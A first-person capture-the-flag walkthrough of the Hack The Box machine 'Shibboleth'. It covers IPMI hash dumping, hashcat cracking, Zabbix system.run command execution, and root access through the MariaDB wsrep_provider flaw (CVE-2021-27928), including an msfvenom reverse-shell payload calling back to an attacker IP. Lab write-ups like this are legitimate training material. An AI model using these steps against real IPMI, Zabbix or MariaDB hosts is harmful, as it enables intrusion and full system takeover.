Shibboleth — Hackthebox Walkthrough

This was a cool box that I enjoyed playing. Learned some new things as well. I liked this box very much because every step of this box felt new. Thanks to knightmare & mrb3n.

Foothold/User

My initial nmap scan revealed only one port.

nmap -p- -sC -sV --min-rate=400 --min-parallelism=512 -vv shibboleth.htb

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.41
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: FlexStart Bootstrap Template - Index

Looking at port 80, was a static webpage.

I tired, looking for interesting things within this, but that was a bust. So I moved on to do some subdomain enumeration and I found 2 subdomains.

ffuf -u http://shibboleth.htb -w /usr/share/wordlists/dirb/big.txt -H "Host: FUZZ.nunchucks.htb" -fw 18

I added these to my /etc/hosts file and look a visit to them. Both of them pointed me to the same webpage and it was Zabbix.

Since I didn’t have any credentials to login with, I had no idea what to do.I tried doing SQLi too, but that took me nowhere. So as always, I took a step back back and went to see what I missed.

I noticed, in the nmap scan, I was only scanning for TCP ports not UDP. So I ran a quick UDP port scan.

sudo nmap -sU -vv 10.10.11.124

PORT    STATE SERVICE  REASON
623/udp open  asf-rmcp udp-response ttl 63

And right-off the bat, I saw UDP port 623 was open. With some research, I got to know that this is running IPMI. Typically this is a, type of embedded computer program used to provide out-of-band monitoring for desktops and servers.So I googled about this and I found a hacktricks article about attacking this service.

623/UDP/TCP - IPMI

I followed this article and used a Metasploit module and exploited the following vulnerability to dump the hashes of the users.

sudo msfdb run
use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOST shibboleth.htb
run

And I was able to get the hash of the Administrator user.

Then I cracked this hash with hashcat.

hashcat --force -m 7300 hash.txt /usr/share/wordlists/rockyout.txt

And I was able to retrieve the Administrator’s password as ilovepumkinpie1.

5cefdd2a82120000f2897c817ad09799d223bc451ae090db02b8fdf698384558f2ffa5b8e301c86ba123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:20ee8cfe6ebf059438a3e7efa97c7af3c574abfb:ilovepumkinpie1

With these credentials, I was able to login to the Zabbix application at http://monitoring.shibboleth.htb/

Username: Administrator
Password: ilovepumkinpie1

With this, I spent almost like 2 hours enumerating this application. And since this was being my first time working with zabbix, I had no idea what to look for.

So I went looking for the zabbix documentation to understand what I can do. And reading through this, I found a way to execute commands by adding a item to a host configuration.

According to the documentation, I browsed to Configuration → Host → Items. Then I created a new item with the Key set to system.run[]. I used my typical payload to get a shell. Also, I specified “nowait” as the second argument to this since it was mentioned in the Docs.

This is all I had to change. Then I added this item and waited.

After couple of seconds, I got a shell as zabbix user. This user was just a service user. I saw there was a system user called ipmi-svc. I was able to login as ipmi-svc with the previous password retrieved from the IPMI service.

Username: ipmi-svc
Password: ilovepumkinpie1

Root

Looking around the file system, I found the config file of the zabbix server at /etc/zabbix/zabbix_server.conf. And I found some database credentials from that file.

cat /etc/zabbix/zabbix_server.conf|grep -v "#"

Username: zabbix
Password: bloooarskybluh

Looking at the open ports, I saw MySQL was running in port 3306.

ss -tlnp

So, I logged in with the above credentials and enumerated the databases. I found some password hashes in the zabbix database and tried to crack them. But it took forever and didn’t give me anything.

Again, I took a step back and looked to see what I had missed. And one thing among them was that the MariaDB version was a little old.

Looking for any exploits for this version, I found that there is a CVE for this which was CVE-2021–27928. According to the CVE, the vulnerability is:

“An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd” : REFER

And I found a GitHub repo that had the steps I needed to exploit this vulnerability.

GitHub - Al1ex/CVE-2021-27928: CVE-2021-27928 MariaDB/MySQL-'wsrep provider' 命令注入漏洞

Following the mentioned steps, first, I made a .so file with msfvenom.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.15.21 LPORT=443 -f elf-so -o test.so

Then I started a listener on port 443 and transferred the file to the box. Then, as mentioned in the POC, I executed the following command.

mysql -u zabbix -p
SET GLOBAL wsrep_provider="/tmp/test.so";

And I got a shell back as root.

Rooted!!!

“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”

Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/

Happy Hacking !!! 😄